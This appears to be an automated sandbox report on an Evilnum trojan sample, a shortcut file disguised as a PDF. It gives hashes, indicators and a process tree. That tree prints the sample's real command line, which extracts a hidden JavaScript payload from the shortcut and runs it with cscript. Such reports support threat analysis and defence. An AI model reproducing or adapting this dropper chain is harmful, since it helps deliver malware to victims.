evilnum | 7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6

Analysis

Target

7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6.lnk
Size

539KB
MD5

02bf629bd6a36b96e8215d41f58415ea
SHA1

4cdd87f5b9ab8c2afcd76e4b8127b0cb6e880cf1
SHA256

7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6
SHA512

ab206443885e308313978f089b802037a0993ce897d85f0b32820e4a8a8444a10b6a16a84df4fba33910ffb43d0a9300f332cde68ec8a560c9cec1d38b45cdfd

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1884 wrote to memory of 848	1884	cmd.exe	28
PID 1884 wrote to memory of 848	1884	cmd.exe	28
PID 1884 wrote to memory of 848	1884	cmd.exe	28
PID 848 wrote to memory of 668	848	cmd.exe	29
PID 848 wrote to memory of 668	848	cmd.exe	29
PID 848 wrote to memory of 668	848	cmd.exe	29
PID 848 wrote to memory of 1220	848	cmd.exe	30
PID 848 wrote to memory of 1220	848	cmd.exe	30
PID 848 wrote to memory of 1220	848	cmd.exe	30
PID 848 wrote to memory of 1348	848	cmd.exe	31
PID 848 wrote to memory of 1348	848	cmd.exe	31
PID 848 wrote to memory of 1348	848	cmd.exe	31
PID 848 wrote to memory of 1304	848	cmd.exe	32
PID 848 wrote to memory of 1304	848	cmd.exe	32
PID 848 wrote to memory of 1304	848	cmd.exe	32
PID 848 wrote to memory of 1820	848	cmd.exe	33
PID 848 wrote to memory of 1820	848	cmd.exe	33
PID 848 wrote to memory of 1820	848	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\7c0e1b2c7bfab05f69cb8f2412e8c6423549ca8d675fcb092c196e6710e6cad6.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Proof of Address.pdf.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Proo*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:848
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Proo*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1220
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1304
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1820

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/1884-53-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp

Filesize
8KB

Download